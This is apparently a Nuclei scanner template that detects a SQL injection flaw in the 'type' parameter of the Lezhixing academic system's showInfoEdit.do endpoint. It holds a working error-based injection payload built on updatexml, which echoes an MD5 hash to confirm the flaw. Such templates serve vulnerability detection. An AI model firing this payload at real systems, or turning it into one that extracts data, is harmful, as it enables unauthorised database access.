id: lezhixing-sqli

info:
  name: 乐知行教务系统showInfoEdit.do文件type参数SQL注入
  author: Str1am
  severity: high
  tags: lezhixing,sqli

requests:
  - method: GET
    path:
      - "{{BaseURL}}/datacenter/downloadApp/showInfoEdit.do?_1428145745205&id=dc5593e2e6dd4d2fa4c1651aa2202c99&time=1428145745185&type='+AND+updatexml(1,concat('~',(select+md5(123))),1)+AND+'Ramv'%3d'Ramv"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "202cb962ac59075b964b07152d234b7"
        part: body
        condition: and